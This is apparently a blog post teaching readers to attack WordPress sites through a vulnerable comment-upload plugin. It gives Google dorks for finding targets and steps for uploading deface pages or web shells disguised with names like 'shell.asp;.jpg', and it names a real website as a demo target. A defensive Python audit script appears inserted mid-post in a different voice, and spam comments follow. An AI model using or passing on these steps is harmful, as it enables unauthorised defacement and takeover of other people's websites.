WordPress Exploit: Thousands of websites are vulnerable

This vulnerability is known as the WordPress Easy Comment Upload Vulnerability.
Many of you should know about it, but I wrote this article for the ones who don't know about it; it could be fun!

Google dorks:

"inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php"
/wp-content/plugins/easy-comment-uploads/upload-form.php
Index of /wp-content/plugins/easy-comment-uploads


Open Google and enter any of the dorks given above.
Now select any website
and go to this URL: site.com/wp-content/plugins/easy-comment-uploads/upload-form.php
You'll get an upload option here :)
Now upload your deface
and check it here: site.com/wp-content/uploads/2011/05/yourfilehere

Note: On some websites you can upload your deface only as txt, and you can upload a shell on only 50% of sites. Upload the shell in image format, e.g. shell.asp;.jpg
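For site owners, the paths and the filename trick above translate directly into an audit. The following Python is an added example, not from the original post: it checks a webroot for the plugin's upload form and scans wp-content/uploads for names like shell.asp;.jpg and for image-named files whose content is not an image. The executable-extension list, the function names and the sample files are assumptions constructed for illustration.

```python
import tempfile
from pathlib import Path

PLUGIN_FORM = "wp-content/plugins/easy-comment-uploads/upload-form.php"  # path from the post
EXEC_EXT = {"php", "php5", "phtml", "asp", "aspx", "jsp", "cgi", "pl"}  # assumed list
MAGIC = {"jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff", "png": b"\x89PNG", "gif": b"GIF8"}

def name_reason(name):
    """Flag names like shell.asp;.jpg: an executable extension anywhere after the stem."""
    exts = [p for p in name.lower().replace(";", ".").split(".") if p][1:]
    if exts and exts[-1] in EXEC_EXT:
        return "executable extension"
    if any(e in EXEC_EXT for e in exts[:-1]):
        return "executable extension hidden before ." + exts[-1]
    return None

def content_reason(path):
    """Flag files whose image extension does not match their leading bytes."""
    magic = MAGIC.get(path.suffix.lower().lstrip("."))
    with path.open("rb") as fh:
        if magic and not fh.read(8).startswith(magic):
            return "image extension but content is not an image"
    return None

def audit(webroot):
    """Return sorted (relative path, reason) findings for one WordPress webroot."""
    root, findings = Path(webroot), []
    if (root / PLUGIN_FORM).is_file():
        findings.append((PLUGIN_FORM, "plugin upload form present"))
    for f in (root / "wp-content" / "uploads").rglob("*"):
        reason = f.is_file() and (name_reason(f.name) or content_reason(f))
        if reason:
            findings.append((f.relative_to(root).as_posix(), reason))
    return sorted(findings)

def demo():
    """Audit a constructed webroot (all file contents are made-up sample data)."""
    files = {PLUGIN_FORM: b"<?php /* placeholder */",
             "wp-content/uploads/2011/05/shell.asp;.jpg": b"<% constructed %>",
             "wp-content/uploads/2011/05/photo.jpg": b"\xff\xd8\xff\xe0constructed",
             "wp-content/uploads/2011/05/fake.png": b"<html>constructed</html>"}
    with tempfile.TemporaryDirectory() as tmp:
        for rel, data in files.items():
            (Path(tmp) / rel).parent.mkdir(parents=True, exist_ok=True)
            (Path(tmp) / rel).write_bytes(data)
        return audit(tmp)

if __name__ == "__main__":
    print(*demo(), sep="\n")
```

A deface uploaded as plain .txt will not be caught by either check, so any finding for the upload form itself should be treated as a reason to review the whole uploads directory.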

DEMO:
http://www.findthepearl.com/
http://www.findthepearl.com/wp-content/plugins/easy-comment-uploads/

Thank you for reading. Stay in touch with filehouse for all the latest updates. :)

3 comments:

  1. I will recommend my friends to read this. I will bookmark your blog and have my children check up here often. I am quite sure they will learn lots of new stuff here than anybody else!

  2. Wonderful information. I had come to know about your blog from my friend Satya, Hyderabad. I have read posts of yours, and let me tell you, your website gives the best and the most interesting information. This is just the kind of information that I had been looking for. I'm already your RSS reader now and I would regularly watch out for the new posts. Once again hats off to you! Thanks a ton once again, Regards, www.windowsdownloadtricks
